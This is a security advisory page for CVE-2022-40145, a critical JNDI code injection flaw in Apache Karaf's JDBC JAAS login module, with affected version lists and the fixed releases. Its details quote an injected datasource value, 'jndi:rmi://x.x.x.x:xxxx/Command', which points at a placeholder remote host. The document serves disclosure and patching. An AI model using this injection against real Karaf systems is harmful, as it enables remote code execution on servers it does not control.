GHSA-c2p4-8mvv-rwmv

Source

https://github.com/advisories/GHSA-c2p4-8mvv-rwmv

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-c2p4-8mvv-rwmv/GHSA-c2p4-8mvv-rwmv.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-c2p4-8mvv-rwmv

Aliases

CVE-2022-40145

Published

2022-12-21T18:30:22Z

Modified

2023-11-08T04:10:22.672216Z

Severity

9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

Apache Karaf vulnerable to potential code injection

Details

This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.

Database specific

{
    "nvd_published_at": "2022-12-21T16:15:00Z",
    "github_reviewed_at": "2022-12-21T18:49:57Z",
    "severity": "CRITICAL",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-20",
        "CWE-74"
    ]
}

References

Affected packages

Maven / org.apache.karaf:apache-karaf

Package

Name: org.apache.karaf:apache-karaf; View open source insights on deps.dev
Purl: pkg:maven/org.apache.karaf/apache-karaf

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

4.3.8

Affected versions

2.*

2.0.0

2.1.0

2.1.1

2.1.2

2.1.3

2.1.4

2.1.5

2.1.6

2.2.0

2.2.1

2.2.2

2.2.3

2.2.4

2.2.5

2.2.6

2.2.7

2.2.8

2.2.9

2.2.10

2.2.11

2.3.0

2.3.1

2.3.2

2.3.3

2.3.4

2.3.5

2.3.6

2.3.7

2.3.8

2.3.9

2.3.10

2.3.11

2.3.12

2.4.0

2.4.1

2.4.2

2.4.3

2.4.4

3.*

3.0.0.RC1

3.0.0

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.0.7

3.0.8

3.0.9

3.0.10

4.*

4.0.0.M1

4.0.0.M2

4.0.0.M3

4.0.0

4.0.1

4.0.2

4.0.3

4.0.4

4.0.5

4.0.6

4.0.7

4.0.8

4.0.9

4.0.10

4.1.0

4.1.1

4.1.2

4.1.3

4.1.4

4.1.5

4.1.6

4.2.0.M1

4.2.0.M2

4.2.0

4.2.1

4.2.3

4.2.4

4.2.5

4.2.6

4.2.7

4.2.8

4.2.9

4.2.10

4.2.11

4.2.12

4.2.13

4.2.14

4.2.15

4.2.16

4.3.0.RC1

4.3.0

4.3.1

4.3.2

4.3.3

4.3.4

4.3.5

4.3.6

4.3.7

Maven / org.apache.karaf:apache-karaf

Package

Name: org.apache.karaf:apache-karaf; View open source insights on deps.dev
Purl: pkg:maven/org.apache.karaf/apache-karaf

Affected ranges

Type: ECOSYSTEM
Events: Introduced

4.4.0

Fixed

4.4.2

Affected versions

4.*

4.4.0

4.4.1